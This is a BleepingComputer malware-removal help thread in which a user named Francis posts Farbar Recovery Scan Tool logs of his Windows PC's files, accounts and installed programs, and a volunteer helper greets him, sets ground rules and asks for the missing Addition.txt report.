2021-04-13 11:04 - 2021-04-13 11:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js
2021-04-13 11:04 - 2021-04-13 11:05 - 000000000 ____D C:\Program Files\nodejs
2021-04-13 11:04 - 2021-04-13 11:04 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\npm
2021-04-13 10:48 - 2021-04-13 11:02 - 028917760 _____ C:\Users\FRANCIS\Downloads\node-v15.14.0-x64.msi
2021-04-12 20:14 - 2021-04-12 20:14 - 000000000 ____D C:\Users\FRANCIS\Downloads\myfonts-win.exe
2021-04-12 20:14 - 2021-04-12 20:13 - 018481401 _____ C:\Users\FRANCIS\Downloads\myfonts-win.exe.zip
2021-04-12 18:29 - 2021-05-02 09:50 - 000000000 ____D C:\Users\FRANCIS\Desktop\myfonts-downloader
2021-04-12 18:29 - 2021-04-12 18:27 - 000003240 _____ C:\Users\FRANCIS\Downloads\myfonts-downloader.zip
2021-04-12 18:09 - 2021-05-06 15:20 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Code
2021-04-12 18:09 - 2021-05-06 09:42 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Visual Studio Code
2021-04-12 18:09 - 2021-04-12 18:09 - 000001413 _____ C:\Users\FRANCIS\Desktop\Visual Studio Code.lnk
2021-04-12 18:09 - 2021-04-12 18:09 - 000000000 ____D C:\Users\FRANCIS\.vscode
2021-04-10 20:36 - 2021-04-11 14:46 - 000000000 ____D C:\Users\FRANCIS\Downloads\Maude 1972 to 1978 (Complete TV series in MP4 format)
2021-04-10 20:03 - 2021-04-10 20:03 - 000001114 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Rush.lnk
2021-04-10 20:00 - 2021-04-10 20:00 - 000001137 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2020.lnk
2021-04-10 19:57 - 2021-04-10 19:57 - 000001077 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Prelude 2020.lnk
2021-04-10 19:55 - 2021-04-10 19:55 - 000001071 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2021.lnk
2021-04-10 19:51 - 2021-04-10 19:51 - 000001149 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Media Encoder 2020.lnk
2021-04-10 19:48 - 2021-04-10 19:48 - 000001092 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Lightroom Classic.lnk
2021-04-10 19:45 - 2021-04-10 19:45 - 000001059 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe InDesign 2021.lnk
2021-04-10 19:40 - 2021-04-10 19:40 - 000001033 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe InCopy 2021.lnk
2021-04-10 19:36 - 2021-04-10 19:36 - 000002500 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2021.lnk
2021-04-10 19:32 - 2021-04-10 19:32 - 000001920 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Fuse.lnk
2021-04-10 19:23 - 2021-04-10 19:23 - 000001095 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Dreamweaver 2021.lnk
2021-04-10 19:19 - 2021-04-10 19:19 - 000001036 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Dimension.lnk
2021-04-10 19:19 - 2021-04-10 19:19 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Dimension CC
2021-04-10 19:16 - 2021-04-10 19:16 - 000001349 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Character Animator 2020.lnk
2021-04-10 19:12 - 2021-04-10 19:12 - 000001033 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Bridge 2021.lnk
2021-04-10 19:10 - 2021-04-10 19:10 - 000001089 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Audition 2020.lnk
2021-04-10 19:07 - 2021-04-10 19:07 - 000001045 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Animate 2021.lnk
2021-04-10 18:43 - 2021-04-10 18:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maxon
2021-04-10 18:42 - 2021-04-10 18:42 - 000000000 ____D C:\Program Files (x86)\LooksBuilder
2021-04-10 18:39 - 2021-04-10 18:43 - 000000000 ____D C:\Program Files\Maxon Cinema 4D R23
2021-04-10 18:38 - 2021-04-10 18:38 - 000001257 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects 2020.lnk
2021-04-10 18:16 - 2021-04-13 18:56 - 000002121 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat Distiller DC.lnk
2021-04-10 18:16 - 2021-04-13 18:56 - 000002110 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat DC.lnk
2021-04-08 15:15 - 2021-04-08 15:15 - 000000000 ____D C:\Program Files (x86)\Teams Installer
2021-04-08 15:12 - 2021-04-08 15:12 - 000002463 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business.lnk
2021-04-08 15:12 - 2021-04-08 15:12 - 000002458 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word.lnk
2021-04-08 15:12 - 2021-04-08 15:12 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint.lnk
2021-04-08 15:12 - 2021-04-08 15:12 - 000002421 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk
2021-04-08 15:12 - 2021-04-08 15:12 - 000002420 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk
2021-04-08 15:12 - 2021-04-08 15:12 - 000002414 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook.lnk
2021-04-08 15:12 - 2021-04-08 15:12 - 000002408 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher.lnk
2021-04-08 15:12 - 2021-04-08 15:12 - 000002400 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote.lnk
2021-04-08 15:12 - 2021-04-08 15:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
2021-04-08 15:11 - 2021-04-08 15:11 - 000000000 ____D C:\Program Files\Common Files\DESIGNER
2021-04-08 13:22 - 2021-05-02 14:24 - 000000000 ____D C:\Program Files\Microsoft Office
2021-04-08 13:22 - 2021-04-08 13:22 - 000000000 ____D C:\Program Files\Microsoft Office 15
2021-04-08 13:16 - 2021-04-08 13:16 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Beta Apps
2021-04-07 09:58 - 2021-05-03 22:05 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\discord
2021-04-07 09:58 - 2021-05-03 21:16 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Discord
2021-04-07 09:58 - 2021-04-07 09:58 - 000002244 _____ C:\Users\FRANCIS\Desktop\Discord.lnk
2021-04-07 09:58 - 2021-04-07 09:58 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2021-04-06 19:05 - 2021-04-06 19:05 - 000254464 _____ C:\Users\FRANCIS\Downloads\Lecture 1 Power Cycle Rankine Cycle.ppt

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-05-06 15:26 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-05-06 15:25 - 2019-12-07 17:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-05-06 15:25 - 2019-12-07 17:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-05-06 15:03 - 2020-09-28 20:13 - 000000000 ____D C:\ProgramData\NVIDIA
2021-05-06 15:01 - 2019-10-03 20:00 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2021-05-06 15:01 - 2019-10-03 20:00 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2021-05-06 14:51 - 2020-09-30 19:58 - 000859788 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-05-06 14:51 - 2019-12-07 17:13 - 000000000 ____D C:\WINDOWS\INF
2021-05-06 14:51 - 2019-05-24 05:05 - 000000000 ___RD C:\Users\FRANCIS\OneDrive
2021-05-06 14:47 - 2019-05-24 05:02 - 000000000 __SHD C:\Users\FRANCIS\IntelGraphicsProfiles
2021-05-06 14:45 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\Registration
2021-05-06 14:43 - 2020-09-30 20:15 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-05-06 14:43 - 2020-09-30 19:34 - 000008192 ___SH C:\DumpStack.log.tmp
2021-05-06 14:43 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\ServiceState
2021-05-06 14:42 - 2019-12-07 17:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2021-05-06 14:18 - 2020-09-29 18:48 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Google
2021-05-06 14:07 - 2020-09-30 19:34 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-05-06 12:30 - 2019-12-07 17:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-05-06 12:21 - 2019-12-07 17:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2021-05-06 12:16 - 2019-12-07 17:50 - 000000000 ____D C:\WINDOWS\system32\OpenSSH
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\DiagTrack
2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-05-06 12:14 - 2019-12-07 17:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-05-06 12:13 - 2019-12-07 17:52 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\OEMDefaultAssociations.dll
2021-05-06 11:45 - 2020-11-11 21:31 - 000004170 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{BC7AF1B8-2D77-4206-A075-B9FC5A37F7AE}
2021-05-05 14:51 - 2020-09-28 22:08 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Packages
2021-05-05 12:23 - 2020-12-28 20:55 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2021-05-05 08:24 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\NDF
2021-05-04 18:04 - 2020-10-01 12:14 - 000000000 ____D C:\Program Files (x86)\USB Disk Security
2021-05-04 17:36 - 2019-12-07 17:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-05-03 21:54 - 2021-01-28 15:26 - 000000000 ____D C:\Users\FRANCIS\Documents\MATLAB
2021-05-03 20:12 - 2020-12-20 15:43 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\LenovoServiceBridge
2021-05-03 20:02 - 2020-11-16 20:09 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\CrashDumps
2021-05-03 08:56 - 2021-02-05 09:52 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Spotify
2021-05-03 08:55 - 2021-02-05 09:37 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Spotify
2021-05-02 21:07 - 2020-10-01 12:04 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\BitTorrent
2021-05-02 16:43 - 2021-02-24 12:59 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\BitTorrentHelper
2021-05-02 16:10 - 2020-10-01 19:00 - 000000000 ____D C:\Users\FRANCIS\Desktop\Other Files
2021-05-01 10:09 - 2020-09-29 18:20 - 000002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-05-01 10:09 - 2020-09-29 18:20 - 000002283 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2021-05-01 10:09 - 2020-09-29 18:20 - 000002283 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk
2021-04-30 08:09 - 2020-09-30 19:34 - 001284280 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-04-29 08:52 - 2020-09-30 20:15 - 000003382 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3936790745-3440936247-791344644-1001
2021-04-29 08:51 - 2020-09-30 18:58 - 000002376 _____ C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2021-04-28 15:36 - 2020-09-30 09:21 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\ElevatedDiagnostics
2021-04-28 13:17 - 2020-09-29 11:05 - 000000124 _____ C:\WINDOWS\win.ini
2021-04-27 08:12 - 2021-01-26 11:16 - 000000582 _____ C:\WINDOWS\Tasks\MATLAB R2019b Startup Accelerator.job
2021-04-26 17:39 - 2021-01-26 11:16 - 000003252 _____ C:\WINDOWS\system32\Tasks\MATLAB R2019b Startup Accelerator
2021-04-26 17:39 - 2021-01-20 20:37 - 000003152 _____ C:\WINDOWS\system32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-04-26 17:39 - 2021-01-20 20:37 - 000002914 _____ C:\WINDOWS\system32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-04-26 17:39 - 2021-01-20 20:36 - 000003398 _____ C:\WINDOWS\system32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-04-26 17:39 - 2021-01-20 20:36 - 000003196 _____ C:\WINDOWS\system32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-04-26 17:39 - 2021-01-20 20:36 - 000002984 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-04-26 17:39 - 2021-01-20 20:36 - 000002744 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-04-26 17:39 - 2020-11-17 18:19 - 000002858 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3936790745-3440936247-791344644-1002
2021-04-26 17:39 - 2020-10-07 18:29 - 000003482 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2021-04-26 17:39 - 2020-09-30 20:15 - 000003408 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-04-26 17:39 - 2020-09-30 20:15 - 000003184 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-04-26 15:34 - 2020-03-31 17:20 - 000000000 ____D C:\Users\FRANCIS\Downloads\ZIP
2021-04-25 14:12 - 2019-10-31 17:56 - 000000000 ____D C:\Users\FRANCIS\Downloads\The Sims 4 [anadius Repack]
2021-04-25 12:09 - 2020-10-01 11:43 - 000001051 _____ C:\Users\Public\Desktop\WinRAR.lnk
2021-04-25 12:09 - 2020-10-01 11:43 - 000001051 _____ C:\ProgramData\Desktop\WinRAR.lnk
2021-04-25 12:09 - 2020-10-01 11:43 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2021-04-25 12:09 - 2020-10-01 11:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2021-04-25 12:09 - 2020-10-01 11:42 - 000000000 ____D C:\Program Files\WinRAR
2021-04-24 21:59 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2021-04-24 14:27 - 2020-10-07 18:28 - 000002143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2021-04-22 11:57 - 2021-02-22 13:51 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV
2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\et-EE
2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2021-04-16 13:24 - 2020-09-30 19:39 - 002877440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-04-15 12:00 - 2021-01-20 20:37 - 000001450 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2021-04-15 12:00 - 2021-01-20 20:37 - 000001450 _____ C:\ProgramData\Desktop\GeForce Experience.lnk
2021-04-15 12:00 - 2020-09-28 20:13 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2021-04-15 11:59 - 2020-09-28 20:13 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2021-04-15 11:59 - 2020-09-28 20:13 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2021-04-14 14:25 - 2020-09-29 10:54 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-04-14 14:20 - 2020-09-29 10:53 - 131963968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-04-13 20:40 - 2020-10-01 19:00 - 000000000 ____D C:\Users\FRANCIS\Desktop\The Sims Collection
2021-04-13 11:42 - 2020-11-14 20:38 - 000000000 ____D C:\ProgramData\Package Cache
2021-04-12 18:09 - 2020-09-30 18:58 - 000000000 ____D C:\Users\FRANCIS
2021-04-11 14:52 - 2020-09-29 19:44 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\D3DSCache
2021-04-11 09:04 - 2020-09-28 21:07 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2021-04-10 20:56 - 2021-03-30 16:24 - 000000000 ____D C:\ProgramData\Mozilla
2021-04-10 20:15 - 2020-09-28 22:08 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Adobe
2021-04-10 20:12 - 2020-10-05 12:44 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Adobe
2021-04-10 20:03 - 2020-11-14 21:00 - 000000000 ____D C:\Program Files\Adobe
2021-04-10 20:03 - 2019-07-08 11:54 - 000000000 ____D C:\Users\Public\Documents\Adobe
2021-04-10 20:03 - 2019-07-08 11:54 - 000000000 ____D C:\ProgramData\Documents\Adobe
2021-04-10 19:40 - 2020-11-14 21:01 - 000000000 ____D C:\Program Files\Common Files\Adobe
2021-04-10 19:40 - 2020-10-07 18:23 - 000000000 ____D C:\ProgramData\Adobe
2021-04-10 19:25 - 2020-10-07 18:26 - 000000000 ____D C:\Program Files (x86)\Adobe
2021-04-10 18:05 - 2020-10-03 17:56 - 000000000 ____D C:\Users\PC Gamer Jones\AppData\Roaming\Adobe
2021-04-10 17:19 - 2021-02-26 18:05 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v3 - [CrackzSoft]
2021-04-08 15:12 - 2019-12-07 17:14 - 000000000 ____D C:\Program 
Files\Common Files\microsoft shared
2021-04-07 19:38 - 2021-01-20 20:37 - 002817904 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2021-04-07 19:38 - 2021-01-20 20:37 - 002171760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2021-04-07 19:38 - 2021-01-20 20:37 - 001293680 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvRtmpStreamer64.dll
2021-04-07 10:21 - 2021-04-04 12:00 - 000000000 ____D C:\Users\FRANCIS\Downloads\sims-4-updater-0.5.4
2021-04-07 09:59 - 2020-10-01 18:25 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\SquirrelTemp

==================== Files in the root of some directories ========

2021-04-28 09:18 - 2021-04-28 13:22 - 000000049 _____ () C:\Users\FRANCIS\AppData\Roaming\MCVi2UserDetail.ini
2020-11-17 18:19 - 2020-11-17 18:19 - 000000000 _____ () C:\Users\FRANCIS\AppData\Local\oobelibMkey.log

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Also attached here is the addition.txt

I would like to know the next instructions after seeing this.

Thank you!

#2 Oh My!

    Adware and Spyware and Malware

  • Malware Response Instructor
  • 61,636 posts
  • Gender:Male
  • Location:California

Posted 06 May 2021 - 07:47 AM

Greetings Jones2021Riano and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, please keep in mind most of us at BleepingComputer volunteer our assistance for your benefit in your time of need. Please try to match our commitment to you with your patience toward us.
  • It is important to not run any tools or take any steps other than those I will provide for you.
  • Please perform all steps in the order they are listed. If things are not clear or you experience problems be sure to stop and let me know.
  • Please copy and paste all logs into your post unless otherwise requested.
  • When your computer is clean I will let you know, provide instructions to remove tools and reports, and offer you information about how you can combat future infections.
  • If you do not reply to your topic after 5 days I will assume it has been abandoned and I will close it.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and let me know.

Thank you for your patience thus far.

Please allow me just a bit of time to review what you have posted.

Lord, to whom shall we go? You have the words of eternal life and we have believed and have come to know that you are the Holy One of God. John 6:68-69

The Man on the Middle Cross Said I Could Come

#3 Jones2021Riano

  • Topic Starter
  • Members
  • 45 posts

Posted 06 May 2021 - 07:54 AM

I read and understand all ground rules and my name is Francis.


#4 Oh My!

    Adware and Spyware and Malware

  • Malware Response Instructor
  • 61,636 posts
  • Gender:Male
  • Location:California

Posted 06 May 2021 - 08:16 AM

Greetings.

Please copy and paste the Addition.txt report in your reply. It is not attached.

Lord, to whom shall we go? You have the words of eternal life and we have believed and have come to know that you are the Holy One of God. John 6:68-69

The Man on the Middle Cross Said I Could Come

#5 Jones2021Riano

  • Topic Starter
  • Members
  • 45 posts

Posted 06 May 2021 - 07:55 PM

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-04-2021
Ran by FRANCIS (06-05-2021 15:39:19)
Running from C:\Users\FRANCIS\Downloads
Windows 10 Home Single Language Version 20H2 19042.964 (X64) (2020-09-30 12:18:12)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3936790745-3440936247-791344644-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3936790745-3440936247-791344644-503 - Limited - Disabled)
FRANCIS (S-1-5-21-3936790745-3440936247-791344644-1001 - Administrator - Enabled) => C:\Users\FRANCIS
Guest (S-1-5-21-3936790745-3440936247-791344644-501 - Limited - Disabled)
PC Gamer Jones (S-1-5-21-3936790745-3440936247-791344644-1002 - Limited - Enabled) => C:\Users\PC Gamer Jones
WDAGUtilityAccount (S-1-5-21-3936790745-3440936247-791344644-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee VirusScan (Enabled - Up to date) {9D4501E6-72F6-2877-C789-89AF6F535B2C}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
FW: McAfee Firewall (Enabled) {A57E80C3-3899-292F-ECD6-209A91801C57}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat DC (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-0C0F074E4100}) (Version: 21.001.20145 - Adobe Systems Incorporated)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 21.001.20150 - Adobe Systems Incorporated)
Adobe After Effects 2020 (HKLM-x32\...\AEFT_17_7) (Version: 17.7 - Adobe Inc.)
Adobe Animate 2021 (HKLM-x32\...\FLPR_21_0_3) (Version: 21.0.3 - Adobe Inc.)
Adobe Audition 2020 (HKLM-x32\...\AUDT_13_0_13) (Version: 13.0.13 - Adobe Inc.) Adobe Bridge 2021 (HKLM-x32\...\KBRG_11_0_1) (Version: 11.0.1 - Adobe Inc.) Adobe Character Animator 2020 (HKLM-x32\...\CHAR_3_5) (Version: 3.5 - Adobe Inc.) Adobe Dimension (HKLM-x32\...\ESHR_3_4_1) (Version: 3.4.1 - Adobe Inc.) Adobe Dreamweaver 2021 (HKLM-x32\...\DRWV_21_1) (Version: 21.1 - Adobe Inc.) Adobe Fuse CC (Beta) (HKLM-x32\...\FUSE_2017_1_32) (Version: 2017.1 - Adobe Inc.) Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version:  - Adobe) Adobe Illustrator 2021 (HKLM-x32\...\ILST_25_2) (Version: 25.2 - Adobe Inc.) Adobe InCopy 2021 (HKLM-x32\...\AICY_16_1) (Version: 16.1 - Adobe Inc.) Adobe InDesign 2021 (HKLM-x32\...\IDSN_16_1) (Version: 16.1 - Adobe Inc.) Adobe Lightroom Classic (HKLM-x32\...\LTRM_10_1_1) (Version: 10.1 - Adobe Inc.) Adobe Media Encoder 2020 (HKLM-x32\...\AME_14_9) (Version: 14.9 - Adobe Inc.) Adobe Photoshop 2021 (HKLM-x32\...\PHSP_22_2) (Version: 22.2.0.183 - Adobe Inc.) Adobe Prelude 2020 (HKLM-x32\...\PRLD_9_0_2) (Version: 9.0.2 - Adobe Inc.) Adobe Premiere Pro 2020 (HKLM-x32\...\PPRO_14_9) (Version: 14.9 - Adobe Inc.) Adobe Premiere Rush (HKLM-x32\...\RUSH_1_5_50) (Version: 1.5.50 - Adobe Inc.) Anaconda3 2020.11 (Python 3.8.5 64-bit) (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Anaconda3 2020.11 (Python 3.8.5 64-bit)) (Version: 2020.11 - Anaconda, Inc.) BitTorrent (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\BitTorrent) (Version: 7.10.5.45967 - BitTorrent Inc.) BitTorrent (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\BitTorrent) (Version: 7.10.5.45785 - BitTorrent Inc.) CLUE - Accusations and Alibis (HKLM-x32\...\{952DD7C5-99FB-40A3-9CBF-2F0A46985D2B}) (Version: 1.0 - LeeGTs Games) CLUE Classic (HKLM-x32\...\CLUE Classic_is1) (Version:  - ) Discord (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Discord) (Version: 0.0.309 - Discord Inc.) 
